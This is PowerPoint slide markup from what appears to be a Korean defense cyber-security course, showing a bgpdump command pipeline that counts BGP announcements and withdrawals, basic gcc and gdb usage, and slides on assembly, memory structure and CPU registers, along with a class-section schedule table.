                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>bgpdump</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> -m $f | awk -F "|" '{print $3}' | sort | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>uniq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> -c | sed 'N; s/\n/,/g; s/A//g; s/W//g; s/ //g' ; done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for f in *.bz2 ; do ts=`echo $f | sed 's/\.//g'` ; br=`bgpdump -m $f | awk -F "|" '{print $3}' | sort | uniq -c | sed 'N;s/\n/,/g;s/A//g;s/W//g'`  ; echo -e ${ts:13:6} ",$br" &gt;&gt;result.csv; done</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AAEC3FF-F741-4F31-8CB0-E6B60D80CBFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="744048" y="1765476"/>
            <a:ext cx="9820538" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>목표 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>A(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:effectLst/>
              </a:rPr>
              <a:t>announcement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>), W(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:effectLst/>
              </a:rPr>
              <a:t>withdrawal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 몇 개인지 추출</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410022913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/Theory/T17 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>국방사이버보안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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/Theory/T18 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>gdb</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사용법</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/Theory/T18 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>gdb</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사용법</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/Theory/T18 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>gdb</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사용법</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/Theory/T18 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>gdb</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사용법</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/Theory/T18 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>gdb</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사용법</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/Theory/T19 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>어셈블리어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 메모리 구조</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cd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> test</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 cd test</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 ]# touch </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code.c</a:t>
              </a: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 ]# vi </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code.c</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="110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 ]# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>gcc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> –o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code.c</a:t>
              </a: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 ]# ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>test_code.c</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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 ]# ./</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>12</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>123</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>0x11dc010</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 ]# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> ./</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code</a:t>
              </a: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gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>) set disassembly-flavor intel</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gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>disas</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="110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/Theory/T19 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>어셈블리어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 메모리 구조</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> compile</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>b[20]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>c</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>a</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="841870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a:t>프로그래밍반</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:endParaRPr lang="ko-KR" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>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a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">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3994274314"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="549765">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>분반</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>분반</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>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t>3 ~ 9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>명 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
                        <a:t>배수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR">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a:t>제한 없음</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR">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a:t>6 ~ 9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>명</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR">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a:t>대위 이원철 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>/ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>교육사</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>대위</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>진</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
                        <a:t>백도우</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>/ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>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/Plan/Circles</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>문화부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계획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정보보호반</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/Theory/T19 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>어셈블리어 </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범용 레지스터</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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>범용 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>레지스터</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="120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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>반복문</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t> 사용 시 반복 카운터로 사용</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>EAX </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>레지스터와 같이 쓰임</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t> 부호 확장 명령 등에 사용</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>EIP</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="120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a:t>범용 레지스터</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="140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/Theory/T19 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>어셈블리어 </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범용 레지스터</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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이전 스택의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
